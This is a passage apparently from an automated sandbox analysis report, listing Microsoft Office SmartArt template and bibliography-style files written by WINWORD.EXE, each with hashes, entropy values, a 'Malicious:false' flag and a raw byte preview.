                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328925[[fn=Interconnected Block Process]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):9191
                                        Entropy (8bit):7.93263830735235
                                        Encrypted:false
                                        SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                        MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                        SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                        SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                        SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                        Malicious:false
                                        Preview:PK.........]w>....<...5.......diagrams/layout1.xmlz........].r.F.}......1w`.J..'.......w..Dn. d....~........pw...O.......s...?...p7.t>e.r<.]u.e..d..|8..\uo.......K...._.Y..E6.|..y;........y.*/:o./...:[.o.+/.....?.....Z.?..s..d}...S.`...b.^o9.e.ty9_d...y>M.....7...e....."....<.v.u...e:].N.t....a....0..}..bQ.Y..>.~..~...U.|..Ev.....N...bw....{...O..Y.Y.&........A.8Ik...N.Z.P.[}t........|m...E..v..,..6........_?..."..K<.=x....$..%@.e..%....$=F..G..e........<F..G51..;......=...e.e.q..d......A...&9'.N.\%.=N.Z.9.s......y.4.Q.c......|8.......Eg.:.ky.z.h.......).O...mz...N.wy.m...yv....~8.?Lg..o.l.y:.....z.i..j.irxI.w...r.......|.=....s};.\u.{t;i~S.......U7..mw...<.vO...M.o...W.U.....}.`V<|..%....l..`>]..".].I.i.N..Z..~Lt.........}?..E~:..>$......x...%.........N....'C.m.=...w.=.Y...+'M.].2 >.]_~...'.?...:....z.O..Y......6..5...sj?.....).B..>.3...G...p.9.K!..[H..1$v../...E V..?`....+[...C......h..!.QI5....<.>...A.d.......

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):4326
                                        Entropy (8bit):7.821066198539098
                                        Encrypted:false
                                        SSDEEP:96:+fF+Jrp7Yo5hnJiGa24TxEcpUeONo1w2NFocy2LQi33Z:2+f7YuhJdJ4TxEcmKwGkk3Z
                                        MD5:D32E93F7782B21785424AE2BEA62B387
                                        SHA1:1D5589155C319E28383BC01ED722D4C2A05EF593
                                        SHA-256:2DC7E71759D84EF8BB23F11981E2C2044626FEA659383E4B9922FE5891F5F478
                                        SHA-512:5B07D6764A6616A7EF25B81AB4BD4601ECEC1078727BFEAB4A780032AD31B1B26C7A2306E0DBB5B39FC6E03A3FC18AD67C170EA9790E82D8A6CEAB8E7F564447
                                        Malicious:false
                                        Preview:PK.........n.A...#............docProps/thumbnail.jpgz.........{4.i....1.n.v)..#.\*....A+..Q(."..D.......#Q)...SQ....2c.ei.JC...N.{......}.s.s..y>....d.(:.;.....q........$.OBaPbI..(.V...o.....'..b..edE.J.+.....".tq..dqX.......8...CA.@..........0.G.O.$Ph...%i.Q.CQ.>.%!j..F..."?@.1J.Lm$..`..*oO...}..6......(%....^CO..p......-,.....w8..t.k.#....d..'...O...8....s1....z.r...rr...,(.)...*.]Q]S.{X.SC{GgWw..O....X./FF9._&..L.....[z..^..*....C...qI.f... .Hq....d*.d..9.N{{.N.6..6)..n<...iU]3.._.....%./.?......(H4<.....}..%..Z..s...C@.d>.v...e.'WGW.....J..:....`....n..6.....]W~/.JX.Qf..^...}...._Sg.-.p..a..C_:..F..E.....k.H..........-Bl$._5...B.w2e...2...c2/y3.U...7.8[.S}H..r/..^...g...|...l..\M..8p$]..poX-/.2}..}z\.|.d<T.....1....2...{P...+Y...T...!............p..c.....D..o..%.d.f.~.;.;=4.J..]1"("`......d.0.....L.f0.l..r8..M....m,.p..Y.f....\2.q. ...d9q....P...K..o!..#o...=.........{.p..l.n...........&..o...!J..|)..q4.Z.b..PP....U.K..|.i.$v

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):7370
                                        Entropy (8bit):7.9204386289679745
                                        Encrypted:false
                                        SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                        MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                        SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                        SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                        SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                        Malicious:false
                                        Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5596
                                        Entropy (8bit):7.875182123405584
                                        Encrypted:false
                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                        MD5:CDC1493350011DB9892100E94D5592FE
                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                        Malicious:false
                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):3683
                                        Entropy (8bit):7.772039166640107
                                        Encrypted:false
                                        SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                        MD5:E8308DA3D46D0BC30857243E1B7D330D
                                        SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                        SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                        SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                        Malicious:false
                                        Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):4888
                                        Entropy (8bit):7.8636569313247335
                                        Encrypted:false
                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                        Malicious:false
                                        Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6448
                                        Entropy (8bit):7.897260397307811
                                        Encrypted:false
                                        SSDEEP:192:tgaoRbo1sMjb0NiJ85oPtqcS+yaXWoa8XBzdJYnLYFtWT7:LR1sk+i4o1qc1yaukzd8MK
                                        MD5:42A840DC06727E42D42C352703EC72AA
                                        SHA1:21AAAF517AFB76BF1AF4E06134786B1716241D29
                                        SHA-256:02CCE7D526F844F70093AC41731D1A1E9B040905DCBA63BA8BFFC0DBD4D3A7A7
                                        SHA-512:8886BFD240D070237317352DEB3D46C6B07E392EBD57730B1DED016BD8740E75B9965F7A3FCD43796864F32AAE0BE911AB1A670E9CCC70E0774F64B1BDA93488
                                        Malicious:false
                                        Preview:PK.........k.>........'......diagrams/layout1.xmlz........].r.8.}.V.?p.n....g*5..JUn.....(SU......T.l.......X.d."m."..S....F..P.........-..<Y^..=..e.L....m>.pG.....M~...+\....u}o...".Yn}Y.".-r......0...'/........{........F.~.M8.d....(.....q.D.....4\.;.D,.\.)n.S....Z.cl.|<..7._.dk..7..E.......kS...d.....i.....noX...o.W#9..}.^..I0....G.......+.K.[i.O.|G..8=.;.8.8.8.8.....{..-..^.y..[.....`...0..f...Q<^~..*.l....{...pA.z.$.$R.../...E.(..Q.(V.E_ ......X]Q..Y9.......>...8......l..--.ug.......I.;..].u.b.3Lv:.d.%H..l<...V...$.M..A>...^M./.[..I....o~,.U. .$d\..?........O.;..^M..O...A.$Yx..|f.n...H.=.|!cG)dd%..(... ..Xe......2B."i...n....P.R..E?... Y.I6...7n..Xs..J..K..'..JaU..d..|.(y.a.....d......D.Dr...._.._..m..Yu..6.o.\......&.m....wy...4k?..~........f....0.. \...}iS.i..R....q-#_..g........{Z.u.V.r(....j.I...,R..f.=.n.[.'..L'd.n C.0.I.....RpaV........c.k..NR....)B^k...d.i...d0.E. ^..G.']....x.c.>'..p...y.ny.P.x6..%.J\.....De.B\.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):5630
                                        Entropy (8bit):7.87271654296772
                                        Encrypted:false
                                        SSDEEP:96:n5ni6jKZWsD+QJaUQ7R6qYFF5QS+BEgeJam6S7ZCHuKViGa2CnnLYLt/ht:nccqxIBdQ1QS+uDJanS7ZCHHVdJCnLY5
                                        MD5:2F8998AA9CF348F1D6DE16EAB2D92070
                                        SHA1:85B13499937B4A584BEA0BFE60475FD4C73391B6
                                        SHA-256:8A216D16DEC44E02B9AB9BBADF8A11F97210D8B73277B22562A502550658E580
                                        SHA-512:F10F7772985EDDA442B9558127F1959FF0A9909C7B7470E62D74948428BFFF7E278739209E8626AE5917FF728AFB8619AE137BEE2A6A4F40662122208A41ABB2
                                        Malicious:false
                                        Preview:PK...........<..W8...j.......diagrams/layout1.xmlz........]......Hy..{...n .l.:.D.vvW..s....-a..fg&.}.\..+......4M..'=...(._.U]U......_.....U...k}.y.,......C..._^.......w/."7....v..Ea........Q..u..D{..{v.x.]....AtB15u..o...w..o.1...f.L...I<[zk7..7^..,.h.&l3...#..)..'H..d.r.#w=b...Ocw.y.&.v..t.>.s..m^M7..8I?o7................H...b....Qv.;'..%.f..#vR....V.H.),g..`...)(..m...[l...b...,.....U...Q.{.y.y.....G.I.tT.n..N.....A.tR..tr....i.<.......,.n:.#.A..a!X.......DK..;v..._M..lSc../n...v.....}.....I.|8.!b.C..v..|.....4l..n.;<9.i./..}!&2.c/.r...>.X02[..|.a.-.....$#-....>...{.M].>3.,\o.x....X%;.F.k.)*".I8<.0..#......?.h..-..O.2.B.s..v....{Abd...h0....H..I.. ...%...$1.Fyd..Y....U...S.Y.#.V.....TH(....%..nk.3Y.e.m.-.S..Q...j.Ai..E..v......4.t.|..&"...{..4.!.h.....C.P.....W...d[.....U<Yb;B.+W.!.@B....!.=......b"...Y.N;.#..Q...0G.lW...]7:...#9!z......|f..r..x.....t........`.uL1u.:.....U.D.n.<Q.[%...ngC./..|...!..q;;.w.".D..lt.".l.4".mt...E..mt

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                        Category:dropped
                                        Size (bytes):6193
                                        Entropy (8bit):7.855499268199703
                                        Encrypted:false
                                        SSDEEP:192:WavHMKgnU2HUGFhUnkbOKoztj1QfcnLYut3d8:YKeUlGXUnC+HQSMp
                                        MD5:031C246FFE0E2B623BBBD231E414E0D2
                                        SHA1:A57CA6134779D54691A4EFD344BC6948E253E0BA
                                        SHA-256:2D76C8D1D59EDB40D1FBBC6406A06577400582D1659A544269500479B6753CF7
                                        SHA-512:6A784C28E12C3740300883A0E690F560072A3EA8199977CBD7F260A21E8346B82BA8A4F78394D3BB53FA2E98564B764C2D0232C40B25FB6085C36D20D70A39D1
                                        Malicious:false
                                        Preview:PK........X..<..Zn|...........diagrams/layout1.xmlz........]..H.}......M,l#g.j:.G-eu.*S=.$......T_6..I...6...d.NJ....r.p.p.........|.z.K.M..L.T.(........<..ks.......o...t}...P..*.7...`.+.[...H..._..X.u.....N....n....n|..=.....K.:.G7.u....."g.n.h...O.,...c...f.b.P......>[l.....j.*.?..mxk..n..|A...,\o..j..wQ.....lw.~].Lh..{3Y..D..5.Y..n..Mh.r..J....6*.<.kO...Alv.._.qdKQ.5...-FMN......;.~..._..pv..&...%"Nz].n............vM.`..k..a.:.f]...a........y.....g0..`........|V...Yq.....#...8....n..i7w<2Rp...R.@.]..%.b%..~...a..<.j...&....?...Qp..Ow|&4>...d.O.|.|...Fk;t.P[A..i.6K.~...Y.N..9......~<Q..f...i.....6..U...l. ..E..4$Lw..p..Y%NR..;...B|B.U...\e......S...=...B{A.]..*....5Q.....FI..w....q.s{.K....(.]...HJ9........(.....[U|.....d71.Vv.....a.8...L.....k;1%.T.@+..uv.~v.]`.V....Z.....`.M.@..Z|.r........./C..Z.n0.....@.YQ.8..q.h.....c.%...p..<..zl.c..FS.D..fY..z..=O..%L..MU..c.:.~.....F]c......5.=.8.r...0....Y.\o.o....U.~n...`...Wk..2b......I~

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3075
                                        Entropy (8bit):7.716021191059687
                                        Encrypted:false
                                        SSDEEP:48:96yn4sOBoygpySCCxwKsZCB2oLEIK+aQpUNLRQWtmMamIZxAwCC2QnyODhVOzP4:l0vCxJsZQ2ofpKvtmMdIZxAwJyODhVOE
                                        MD5:67766FF48AF205B771B53AA2FA82B4F4
                                        SHA1:0964F8B9DC737E954E16984A585BDC37CE143D84
                                        SHA-256:160D05B4CB42E1200B859A2DE00770A5C9EBC736B70034AFC832A475372A1667
                                        SHA-512:AC28B0B4A9178E9B424E5893870913D80F4EE03D595F587AA1D3ACC68194153BAFC29436ADFD6EA8992F0B00D17A43CFB42C529829090AF32C3BE591BD41776D
                                        Malicious:false
                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK.........nB;O.......k......._rels/.rels...J.@.._e..4...i/.,x..Lw'....v'.<....WpQ..,......7?....u.y..;bL../..3t.+.t.G....Y.v8.eG.MH,....(\..d..R....t>Z.<F-..G.(..\.x...l?..M..:#........2.#.[..H7..#g{...._j...(.....q......;.5'..Nt..."...A.h........>....\.'...L..D..DU<.....C.TKu.5Tu....bV..;PK.........C26.b..............diagrams/layout1.xml.T.n. .}N....).je./m.+u....`{..0P......p..U}c.9g..3....=h.(.."..D-.&....~.....y..I...(r.aJ.Y..e..;.YH...P.{b......hz.-..>k.i5..z>.l...f...c..Y...7.ND...=.%..1...Y.-.o.=)(1g.{.".E.>2.=...]Y..r0.Q...e.E.QKal,.....{f...r..9-.mH..C..\.w....c.4.JUbx.p Q...R......_...G.F...uPR...|um.+g..?..C..gT...7.0.8l$.*.=qx.......-8..8.

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):5151
                                        Entropy (8bit):7.859615916913808
                                        Encrypted:false
                                        SSDEEP:96:WkV3UHhcZDEteEJqeSGzpG43GUR8m8b6dDLiCTfjKPnD6H5RhfuDKNtxx3+7tDLp:Wq3UBc9EJqIpGgD5dDL1DjKvDKhfnNti
                                        MD5:6C24ED9C7C868DB0D55492BB126EAFF8
                                        SHA1:C6D96D4D298573B70CF5C714151CF87532535888
                                        SHA-256:48AF17267AD75C142EFA7AB7525CA48FAB579592339FB93E92C4C4DA577D4C9F
                                        SHA-512:A3E9DC48C04DC8571289F57AE790CA4E6934FBEA4FDDC20CB780F7EA469FE1FC1D480A1DBB04D15301EF061DA5700FF0A793EB67D2811C525FEF618B997BCABD
                                        Malicious:false
                                        Preview:PK.........nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........5nB;.ndX....`......._rels/.rels...J.1.._%..f.J.J..x..AJ.2M&......g..#............|.c..x{_._..^0e.|.gU..z.....#.._..[..JG.m.....(...e..r."....P)....3..M].E:..SO.;D..c..J..rt...c.,.....a.;.....$.../5..D.Ue.g...Q3......5.':...@...~t{.v..QA>.P.R.A~..^AR.S4G......].n...x41....PK.........^5..s.V....Z......diagrams/layout1.xml.[]o.F.}N~..S.......VU.U+m6R........&.d.}...{M....Q.S....p9.'./O..z."..t>q....."[..j>y..?...u....[.}..j-...?Y..Bdy.I./.....0.._.....-.s...rj...I..=..<..9.|>YK.....o.|.my.F.LlB..be/E.Y!.$6r.f/.p%.......U....e..W.R..fK....`+?.rwX.[.b..|..O>o.|.....>1.......trN`7g..Oi.@5..^...]4.r...-y...T.h...[.j1..v....G..........nS..m..E"L...s

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):333258
                                        Entropy (8bit):4.654450340871081
                                        Encrypted:false
                                        SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                        MD5:5632C4A81D2193986ACD29EADF1A2177
                                        SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                        SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                        SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                        Malicious:false
                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl (copy)

                                        Download File
                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):296658
                                        Entropy (8bit):5.000002997029767
                                        Encrypted:false
                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                        Malicious:false
